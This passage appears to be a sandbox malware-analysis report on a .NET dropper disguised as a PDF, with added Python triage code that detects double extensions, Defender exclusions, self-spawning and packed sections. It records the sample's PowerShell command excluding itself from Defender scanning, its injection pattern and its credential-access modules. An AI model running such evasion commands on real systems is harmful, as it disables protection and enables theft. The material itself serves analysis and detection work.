                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PLAN] ([CREDIT_ID], [MATURITY_DATE], [MATURITY_SUM], [MATURITY_NOTE], [MODIF_DATE]) VALUES (@CREDIT_ID, @MATURITY_DATE, @MATURITY_SUM, @MATURITY_NOTE, @MODIF_DATE);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE], [INTEREST]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE, @INTEREST);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[Login] SET [User_id] = @User_id, [User_pass] = @User_pass WHERE (([User_id] = @Original_User_id) AND ([User_pass] = @Original_User_pass));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE [dbo].[CREDIT_PLAN] SET [CREDIT_ID] = @CREDIT_ID, [MATURITY_DATE] = @MATURITY_DATE, [MATURITY_SUM] = @MATURITY_SUM, [MATURITY_NOTE] = @MATURITY_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([MATURITY_ID] = @Original_MATURITY_ID) AND ((@IsNull_CREDIT_ID = 1 AND [CREDIT_ID] IS NULL) OR ([CREDIT_ID] = @Original_CREDIT_ID)) AND ([MATURITY_DATE] = @Original_MATURITY_DATE) AND ([MATURITY_SUM] = @Original_MATURITY_SUM) AND ((@IsNull_MATURITY_NOTE = 1 AND [MATURITY_NOTE] IS NULL) OR ([MATURITY_NOTE] = @Original_MATURITY_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[PROD_PERIODS] ([PROD_CODE], [PROD_PERIOD]) VALUES (@PROD_CODE, @PROD_PERIOD);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[INTEREST] SET [PROD_CODE] = @PROD_CODE, [PROD_PERIOD] = @PROD_PERIOD, [SUM_FROM] = @SUM_FROM, [SUM_TO] = @SUM_TO WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_PERIOD] = @Original_PROD_PERIOD) AND ([SUM_FROM] = @Original_SUM_FROM) AND ([SUM_TO] = @Original_SUM_TO));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT] SET [CREDIT_NO] = @CREDIT_NO, [CREDIT_DATE] = @CREDIT_DATE, [CREDIT_PERIOD] = @CREDIT_PERIOD, [CREDIT_END_DATE] = @CREDIT_END_DATE, [CREDIT_BEGIN_DATE] = @CREDIT_BEGIN_DATE, [CLIENT_ID] = @CLIENT_ID, [PROD_CODE] = @PROD_CODE, [CREDIT_SUM] = @CREDIT_SUM, [CREDIT_NOTE] = @CREDIT_NOTE, [MODIF_DATE] = @MODIF_DATE WHERE (([CREDIT_ID] = @Original_CREDIT_ID) AND ([CREDIT_NO] = @Original_CREDIT_NO) AND ((@IsNull_CREDIT_DATE = 1 AND [CREDIT_DATE] IS NULL) OR ([CREDIT_DATE] = @Original_CREDIT_DATE)) AND ([CREDIT_PERIOD] = @Original_CREDIT_PERIOD) AND ((@IsNull_CREDIT_END_DATE = 1 AND [CREDIT_END_DATE] IS NULL) OR ([CREDIT_END_DATE] = @Original_CREDIT_END_DATE)) AND ((@IsNull_CREDIT_BEGIN_DATE = 1 AND [CREDIT_BEGIN_DATE] IS NULL) OR ([CREDIT_BEGIN_DATE] = @Original_CREDIT_BEGIN_DATE)) AND ([CLIENT_ID] = @Original_CLIENT_ID) AND ((@IsNull_PROD_CODE = 1 AND [PROD_CODE] IS NULL) OR ([PROD_CODE] = @Original_PROD_CODE)) AND ([CREDIT_SUM] = @Original_CREDIT_SUM) AND ((@IsNull_CREDIT_NOTE = 1 AND [CREDIT_NOTE] IS NULL) OR ([CREDIT_NOTE] = @Original_CREDIT_NOTE)) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: UPDATE [dbo].[CREDIT_PRODUCT] SET [PROD_NAME] = @PROD_NAME, [PROD_ACTIVE] = @PROD_ACTIVE, [PROD_SUM_FROM] = @PROD_SUM_FROM, [PROD_SUM_TO] = @PROD_SUM_TO, [MODIF_DATE] = @MODIF_DATE WHERE (([PROD_CODE] = @Original_PROD_CODE) AND ([PROD_NAME] = @Original_PROD_NAME) AND ([PROD_ACTIVE] = @Original_PROD_ACTIVE) AND ([PROD_SUM_FROM] = @Original_PROD_SUM_FROM) AND ([PROD_SUM_TO] = @Original_PROD_SUM_TO) AND ((@IsNull_MODIF_DATE = 1 AND [MODIF_DATE] IS NULL) OR ([MODIF_DATE] = @Original_MODIF_DATE)));
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000000.1397955965.0000000000822000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: INSERT INTO [dbo].[CREDIT_PRODUCT] ([PROD_NAME], [PROD_ACTIVE], [PROD_SUM_FROM], [PROD_SUM_TO], [MODIF_DATE]) VALUES (@PROD_NAME, @PROD_ACTIVE, @PROD_SUM_FROM, @PROD_SUM_TO, @MODIF_DATE);
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | ReversingLabs: Detection: 55%
                  Source: unknown | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
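The process-creation rows above carry three detection-relevant facts in one place: the image name uses a document-looking extension in front of an executable one (.pdf.scr.exe), the PowerShell child runs Add-MpPreference -ExclusionPath against the sample's own path under C:\Users, and the sample starts a second copy of its own image (a self-spawn, the usual precursor to writing a payload into a suspended child). The following is an added example, not part of the Joe Sandbox report: a Python triage that applies those three checks to rows in the "Source ... Process created" shape. The input rows are constructed from the rows above; the lists of document-like and executable extensions and the definition of a user-writable path are this example's own assumptions.

```python
import re
from collections import Counter

# Constructed from the report's "Process created" rows (one copy of each distinct row).
SAMPLE_LINES = [
    r'Source: unknown | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"',
    r'Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"',
    r'Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1',
    r'Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"',
]

# Row shape: "Source: <parent image> | Process created: <child image> <child command line>".
# The child image is taken up to the first ".exe" followed by a space, so paths with
# spaces (as in this sample) are kept whole.
LINE_RE = re.compile(
    r'^Source: (?P<parent>.+?) \| Process created: (?P<image>.+?\.exe) (?P<cmdline>.+)$',
    re.IGNORECASE,
)
# Assumption: a document-looking extension immediately followed by an executable one.
DOUBLE_EXT_RE = re.compile(
    r'\.(pdf|docx?|xlsx?|pptx?|txt|jpe?g|png)\.(exe|scr|com|pif|bat|cmd|vbs|js)\b',
    re.IGNORECASE,
)
# Add-MpPreference with any of the exclusion switches; the value may or may not be quoted.
EXCLUSION_RE = re.compile(
    r'Add-MpPreference\s+-Exclusion(?:Path|Process|Extension)\s+"?([^"]+?)"?\s*$',
    re.IGNORECASE,
)
# Assumption: locations an unprivileged user can write to.
USER_WRITABLE_RE = re.compile(r'^[a-z]:\\(users|programdata)\\|\\temp\\', re.IGNORECASE)


def parse_line(line):
    """Split one row into parent image, child image and child command line, or None."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def triage(lines):
    """Return (rule, detail) findings for the rows, in the order they fire."""
    findings = []
    for line in lines:
        row = parse_line(line)
        if row is None:
            continue
        parent, image, cmdline = row["parent"], row["image"], row["cmdline"]
        m = DOUBLE_EXT_RE.search(image)
        if m:
            findings.append(("double_extension", f"{image} ({m.group(0)})"))
        m = EXCLUSION_RE.search(cmdline)
        if m:
            excluded = m.group(1)
            scope = "user-writable" if USER_WRITABLE_RE.search(excluded) else "system"
            findings.append(("defender_exclusion", f"{image} excludes {excluded} ({scope})"))
        if parent.lower() == image.lower():
            findings.append(("self_spawn", f"{image} started a second copy of its own image"))
    return findings


def rule_counts(lines):
    """How many times each rule fired, as a plain dict."""
    return dict(Counter(rule for rule, _ in triage(lines)))


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE_LINES):
        print(f"[{rule}] {detail}")
```

On the sample rows the exclusion fires once, the self-spawn once and the double extension twice (once per start of the image); a Defender exclusion pointing into the user profile is the row worth paging on, since legitimate administration excludes fixed install or data directories, not a freshly dropped executable on the desktop.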
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Section loaded (34 modules, in load order): mscoree.dll, apphelp.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, dwrite.dll, amsi.dll, userenv.dll, msasn1.dll, gpapi.dll, windowscodecs.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded (29 modules, in load order): atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wldp.dll, windows.storage.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, propsys.dll, wininet.dll
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Section loaded (40 modules, in load order): mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, ucrtbase_clr0400.dll, uxtheme.dll, windows.storage.dll, wldp.dll, profapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, wbemcomn.dll, amsi.dll, userenv.dll, sspicli.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, secur32.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, msasn1.dll, gpapi.dll, vaultcli.dll, wintypes.dll
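Read as a capability record, the module lists above tell the story of the run: the first run of the .scr.exe image loads only CLR, theming and CryptoAPI plumbing, the PowerShell child loads wininet and urlmon, and the second run of the .scr.exe image pulls in wbemcomn.dll (WMI, which is what the Win32_NetworkAdapter query goes through), rasapi32/mswsock/winhttp/dnsapi (network), schannel and ncryptsslp (TLS) and vaultcli.dll (the Windows Credential Manager client). The following is an added example, not code from the Joe Sandbox report, that groups rows of the "Source ... Section loaded" shape into contiguous runs per source image and tags each run with the capabilities its modules imply. The DLL-to-capability map is a heuristic of this example; the sample rows are a constructed subset of the rows above; and because the report text does not say which process instance a row belongs to, a run boundary is inferred from a change of source image.

```python
import re

# Heuristic module-to-capability map. This is the example's own assumption, not a
# Joe Sandbox rule; every module named here appears in the report's rows above.
CAPABILITY_BY_DLL = {
    "vaultcli.dll": "credential-manager",  # Windows Credential Manager (vault) client API
    "wbemcomn.dll": "wmi",                 # WMI client plumbing
    "schannel.dll": "tls",                 # Schannel security package (TLS)
    "ncryptsslp.dll": "tls",               # Schannel's CNG SSL provider
    "winhttp.dll": "http",
    "wininet.dll": "http",
    "dnsapi.dll": "dns",
    "mswsock.dll": "sockets",              # Winsock service provider
    "rasapi32.dll": "ras",
    "amsi.dll": "amsi-loaded",             # AMSI provider present in-process
}

SECTION_RE = re.compile(
    r'^Source: (?P<process>.+?) \| Section loaded: (?P<dll>\S+\.dll)\s*$', re.IGNORECASE
)

# Constructed subset of the report's rows, kept in report order: first run of the
# .scr.exe image, then powershell.exe, then the second run of the .scr.exe image.
SCR = r"C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_LINES = (
    [f"Source: {SCR} | Section loaded: {d}" for d in ("mscoree.dll", "amsi.dll", "cryptsp.dll")]
    + [f"Source: {PS} | Section loaded: {d}" for d in ("amsi.dll", "wininet.dll", "urlmon.dll")]
    + [f"Source: {SCR} | Section loaded: {d}" for d in (
        "wbemcomn.dll", "amsi.dll", "mswsock.dll", "winhttp.dll", "dnsapi.dll",
        "schannel.dll", "ncryptsslp.dll", "vaultcli.dll")]
)


def profile_loads(lines):
    """Group rows into contiguous runs; a new run starts whenever the source image changes."""
    runs = []
    for line in lines:
        m = SECTION_RE.match(line)
        if not m:
            continue
        process, dll = m.group("process"), m.group("dll").lower()
        if not runs or runs[-1]["process"].lower() != process.lower():
            runs.append({"run": len(runs) + 1, "process": process, "dlls": [], "capabilities": set()})
        runs[-1]["dlls"].append(dll)
        if dll in CAPABILITY_BY_DLL:
            runs[-1]["capabilities"].add(CAPABILITY_BY_DLL[dll])
    return runs


def capabilities_of(lines, run_number):
    """Sorted capability tags of one run (empty list if the run does not exist)."""
    for run in profile_loads(lines):
        if run["run"] == run_number:
            return sorted(run["capabilities"])
    return []


def gained_capabilities(lines, earlier_run, later_run):
    """Tags present in the later run but not the earlier one, e.g. the same image before and after injection."""
    return sorted(set(capabilities_of(lines, later_run)) - set(capabilities_of(lines, earlier_run)))


if __name__ == "__main__":
    for run in profile_loads(SAMPLE_LINES):
        print(f"run {run['run']}: {run['process']} -> {sorted(run['capabilities'])}")
    print("gained in run 3 vs run 1:", gained_capabilities(SAMPLE_LINES, 1, 3))
```

The interesting output is the difference between run 1 and run 3 of the same image: an executable that acquires TLS, DNS, WMI and Credential Manager modules only on its second start is behaving like a loader plus injected payload, which matches the report's injection and credential-theft signatures.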
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, InnerForm.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.cs | .Net Code: W3a5x9yJDD System.Reflection.Assembly.Load(byte[])
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Code function: 0_2_0115DB84 pushfd ; ret 0_2_0115DB89
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Code function: 5_2_02F20C77 push edi; retf 5_2_02F20C7A
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Static PE information: section name: .text entropy: 7.528842413573355
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, bKajDlMRoWfFMCaojU.cs | High entropy of concatenated method names: 'UOsDt5k7Xi', 'CrZDep1ihZ', 'zAnDD4SuGB', 'TBYDoNkqti', 'ud1D3U3Uhb', 'ERfDnsuMch', 'Dispose', 'I5a1E3txgm', 'rBa1IlpesI', 'DFB1NgC42a'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, aoZ5ZOdHfAY3VlgJLe.cs | High entropy of concatenated method names: 'FysscY7vn4', 'V36shH732u', 'Vuysx5d00c', 'sV4sZIu2l0', 'f6Gs24OuCm', 'vC0sYGrlV8', 'CjDs0mMtVp', 'sUQsf2AYak', 'EKJsSDWey7', 'LTIskiyN41'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, RhFK4wgMyLLuTnij1G.cs | High entropy of concatenated method names: 'ToString', 'VE3OWZc5gx', 'v6IOaRYGtB', 'igkO6xYJNo', 'lNjOjX9VOi', 'f4fOQpDu9G', 'jH1OCxDKrw', 'CYpOr9uoEo', 'cbeO4l4TUA', 'wWDOd8Wj92'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, mO0cHCfe6EeD0PN2nv.cs | High entropy of concatenated method names: 'Hq9IKMdLgy', 'GbaIFDcbH9', 'GAnIgPOTGB', 'KY5ImANMw0', 'InNIu1tpnM', 'QQVI8slqsj', 'WT7IMG4jDL', 'RsYI90RqYZ', 'KssILQaIA5', 'AioIRjdq8A'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, IkAS7eRqcx3a3kX44C.cs | High entropy of concatenated method names: 'R4UPNn7VgR', 'W2TPyUBlyp', 'HoBPJNAS19', 'ielPsLbyOX', 'J2lPDyexZf', 'i72PXiCBdD', 'Next', 'Next', 'Next', 'NextBytes'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, dkhx2UU75UPo3M4pIK.cs | High entropy of concatenated method names: 'pLcxRCNQ7', 'ynKZS1TjS', 'bx5Y9PEZL', 'l4Z0PQNKF', 'kAeSkBA54', 'omqkueQNX', 'zkaEcsMEU9ylA05ogY', 'nPrjxUkcAEGyp6n573', 'Dd11TpWJv', 'EWtPmZ9vq'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, kbfO8Pbnl4gKhe2ODL.cs | High entropy of concatenated method names: 'T2m7fgiT4r', 'a5s7Sk9IU5', 'ayq7p8xasj', 'xQN7aBPDFF', 'WxL7jyUIAP', 'N787QiPH5c', 'Wwp7r0Eyeo', 'lvU74OYvT4', 'lCl7wcewuo', 'Poi7W2WYZj'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, aFf7qbAAj88XSIi81E1.cs | High entropy of concatenated method names: 'YNZPRDtXp9', 'yKQPzlQR3P', 'K4woHEdKQl', 'PIVoAENdjg', 'o27oURh44e', 'rynoqhU708', 'IYRo5wVSjm', 'FfuoiqRrgK', 'YlSoE2kYCf', 'dTmoIx1eC5'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, HqPboYL2pr4r8kuGLp.cs | High entropy of concatenated method names: 'nK9DpY2HDX', 'eG0DakZEXi', 'TwND6SoSNt', 'doADj11ElZ', 'NgZDQwJLkk', 'chNDCmOeN5', 'DgaDrxiwLB', 'jfjD4lDu3C', 'NAZDd1jQxS', 'q56DwBofBq'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, HcmjCNrorsuqgIpjA7.cs | High entropy of concatenated method names: 'seqsE37BIe', 'dyQsNQ18uL', 'A5WsJV8j9K', 'qGOJR4PhuQ', 'bMcJzlsHuG', 'WFZsHiuJGh', 'CgZsAhukX4', 'T19sU8TvyK', 'HLssqEMUhi', 'z9Ds5nBjt2'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, JkaYIP88Qn30GQ1v1A.cs | High entropy of concatenated method names: 'Pgxe9yOkjs', 'mQmeRGd046', 'hFA1HldY7V', 'omk1AfRROe', 'GFSeWYLLxl', 'opueT6ayd5', 'EfVebfhHlD', 'Np9eKjAEYX', 'vGteF15Vv8', 'BcRegUHyEl'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, fdPwDTSIaeaio0i1kO.cs | High entropy of concatenated method names: 'FQeNZPfHag', 'RDXNYrLnbD', 'vDmNfCENp9', 'gWgNSP6uP7', 'kqXNtt6jKl', 'iaTNOPHIk6', 'U4gNeB5E07', 'kQHN1lWNq7', 'xPQNDdlTil', 'u7ZNPo2Uu6'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, CltvPrpNjb1VckZWnp.cs | High entropy of concatenated method names: 'hE1Ji7UcNc', 'vBdJI5BlfR', 'iJYJyxt3ev', 'umkJsUZLWT', 'c2VJXKC3hq', 'JGSyuZ796F', 'PtZy8JuJYs', 'kiRyMw623L', 'ROFy9EV8ky', 'qDiyLEpTpg'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, WoIeMMKENcLTkZ5yTy.cs | High entropy of concatenated method names: 'WgQtwDicQN', 'FyxtTslUFu', 'ODetKFcQyo', 'GArtFfTgu8', 'U6btaFuM2B', 'jTjt62r4Tm', 'Jkltj0FmtU', 'cyStQXoodN', 'xGctCGA7up', 'nKItrL6l9d'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, BMJIbmFGTNF56vX1ga.cs | High entropy of concatenated method names: 'kWBtMeeH7u', 'IkMt9iJ2ce', 'wNttLmQVEk', 'Pw3tRAaUaY', 'q6DOeq7JkBf127nBxEy', 'rqaNt57yItV3KxgIw26', 'SVg0bd7rsmvCNKlnxjT', 'GOl6Gt7GTWlmwByXaWF'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, EhbdPpziB5ht4NFO3c.cs | High entropy of concatenated method names: 'VUCPYKSsMc', 'U0VPff3TWo', 'hFbPS2PSD8', 'rTlPpyw3sV', 'TfCPaDx5ph', 'oNaPjvCghS', 'LdxPQc8tQb', 'C0xPncRHEn', 'nxUPcEbWOK', 'JSOPh4tf1i'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, QPotiGAHGh845Es1EeE.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'PQHPWZSy28', 'CycPT6rhZW', 'S9sPb7EPNF', 'g06PKFFGFi', 'owcPFNElDd', 'kDHPgvqXhk', 'O32PmCIMN2'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, oTWR4jX5WAldfeNr9l.cs | High entropy of concatenated method names: 'Mh1qieyNEp', 'i1TqECsHJV', 'VdKqITD8fI', 'tyeqNFIfJn', 'oMRqynEIX5', 'lv4qJUKcH4', 'JFmqsfj4Ck', 'S4IqXUHySb', 'PYsqVLYR9p', 'q2VqGjcJbM'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, uYcnS7N2rgKIWsFxaW.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'YS3UL4javS', 'AWtUR9Rnch', 'ambUzXqlZk', 'igrqHDFXf9', 'hPvqASX3Y7', 'GJrqUXUGQ8', 'DdWqqhWtVw', 'NxtQpSPtFmv42ihs59O'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, EZiWFwIbaBbaLGoZN3.cs | High entropy of concatenated method names: 'Dispose', 'OfFALMCaoj', 'M5NUaB7l8s', 'Ko0HXZOBnl', 'b6AARQRVV2', 'usdAzvNUum', 'ProcessDialogKey', 'qF6UHqPboY', 'AprUA4r8ku', 'lLpUUjkAS7'
                  Source: 0.2.CHARIKLIA JUNIOR DETAILS.pdf.scr.exe.7230000.2.raw.unpack, xtJn9c5XQ9QJTf70qb.cs | High entropy of concatenated method names: 'iFvAsO0cHC', 'p6EAXeD0PN', 'PIaAGeaio0', 'e1kAvOx0MU', 'UPHAtioYlt', 'mPrAONjb1V', 'FrPyBRj8OL0p56JLv7', 'gdFDhcRZ2tZEVZcOUc', 'Fp6AACupZQ', 'sZKAqajAaP'
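The two entropy findings in this section are the same metric applied to different inputs: Shannon entropy of the raw bytes of the .text section (7.53 bits per byte, close to the 8.0 ceiling, which is how packed or encrypted code reads; ordinary compiled code sits well below), and Shannon entropy of each class's concatenated method names (random-looking identifiers such as 'UOsDt5k7Xi' spread their characters far more evenly than 'InitializeComponent' does, and the compiler-generated names that survive, Dispose, ToString, Next, are the giveaway that the rest were renamed). The following is an added example, not part of the Joe Sandbox report, that computes that metric over bytes and over identifier strings. The 7.0 cut-off for a "likely packed" section is an assumption of this example; the section bodies and the ordinary-name list are constructed, and only the first method-name list is copied from the report.

```python
import math
from collections import Counter


def shannon_entropy(data):
    """Shannon entropy in bits per symbol of a bytes or str sequence (0.0 for empty input)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((n / total) * math.log2(n / total) for n in Counter(data).values())


# Assumption: cut-off at or above which a code section is treated as packed or encrypted.
PACKED_SECTION_THRESHOLD = 7.0


def looks_packed(section_bytes, threshold=PACKED_SECTION_THRESHOLD):
    """True when the section's byte entropy reaches the threshold."""
    return shannon_entropy(section_bytes) >= threshold


def method_name_entropy(names):
    """Entropy of the concatenated method names, the per-class metric the report applies."""
    return shannon_entropy("".join(names))


def name_entropy_report(classes):
    """Map class name -> entropy of its method names (rounded), so classes can be ranked."""
    return {cls: round(method_name_entropy(names), 3) for cls, names in classes.items()}


# Constructed section bodies: every byte value equally often (the 8.0 maximum, what
# encrypted or compressed data looks like), a zero-filled padding blob, and plain ASCII.
UNIFORM_SECTION = bytes(range(256)) * 16
ZERO_SECTION = bytes(1024)
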